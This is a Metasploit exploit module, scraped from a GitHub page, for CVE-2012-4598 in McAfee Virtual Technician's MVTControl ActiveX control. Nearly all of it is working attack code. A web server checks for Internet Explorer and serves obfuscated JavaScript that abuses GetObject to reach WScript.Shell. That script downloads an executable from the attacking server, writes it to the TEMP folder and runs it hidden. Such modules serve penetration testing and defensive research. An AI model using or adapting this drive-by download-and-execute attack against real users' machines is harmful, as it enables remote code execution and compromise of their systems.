-
Notifications
You must be signed in to change notification settings - Fork 13.8k
/
mcafee_mvt_exec.rb
117 lines (102 loc) · 3.15 KB
/
mcafee_mvt_exec.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE
def initialize(info={})
super(update_info(info,
'Name' => "McAfee Virtual Technician MVTControl 6.3.0.1911 GetObject Vulnerability",
'Description' => %q{
This module exploits a vulnerability found in McAfee Virtual Technician's
MVTControl. This ActiveX control can be abused by using the GetObject() function
to load additional unsafe classes such as WScript.Shell, therefore allowing remote
code execution under the context of the user.
},
'License' => MSF_LICENSE,
'Author' =>
[
'rgod', #Initial discovery, Poc
'sinn3r' #Metasploit
],
'References' =>
[
[ 'CVE', '2012-4598' ],
[ 'OSVDB', '81657'],
[ 'EDB', '18805' ],
[ 'URL', 'https://kc.mcafee.com/corporate/index?page=content&id=SB10028' ]
],
'Payload' =>
{
'BadChars' => "\x00",
},
'DefaultOptions' =>
{
'EXITFUNC' => "none",
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', {} ]
],
'Privileged' => false,
'DisclosureDate' => '2012-04-30',
'DefaultTarget' => 0))
end
def exploit
@payload_name = rand_text_alpha(rand(6) + 5) + ".exe"
super
end
def on_request_uri(cli, request)
agent = request.headers['User-Agent']
if agent !~ /MSIE \d/
print_error("Browser not supported: #{agent.to_s}")
send_not_found(cli)
return
end
if request.uri =~ /\.exe$/
return if ((p=regenerate_payload(cli))==nil)
data = generate_payload_exe({:code=>p.encoded})
print_status("Sending payload")
send_response(cli, data, {'Content-Type'=>'application/octet-stream'})
return
end
# <object classid='clsid:2EBE1406-BE0E-44E6-AE10-247A0C5AEDCF' id='obj'></object>
js = <<-JS
var obj = new ActiveXObject("MVT.MVTControl.6300");
var ws = obj.GetObject("WScript.Shell");
var ado = obj.GetObject("ADODB.Stream");
var e = ws.Environment("Process");
var url = document.location + "/#{@payload_name}";
var tmp = e.Item("TEMP") + "\\\\#{@payload_name}";
var xml = new ActiveXObject("Microsoft.XMLHTTP");
xml.open("GET", url, false);
xml.send(null);
res = xml.responseBody;
ado.Type = 1;
ado.Mode = 3;
ado.Open();
ado.Write(res);
ado.SaveToFile(tmp);
ws.Run(tmp, 0);
JS
js = ::Rex::Exploitation::JSObfu.new(js)
js.obfuscate(memory_sensitive: true)
html = <<-EOS
<html>
<head>
</head>
<body>
<script defer=defer>
#{js}
</script>
</body>
</html>
EOS
print_status("Sending html")
send_response(cli, html, {'Content-Type'=>'text/html'})
end
end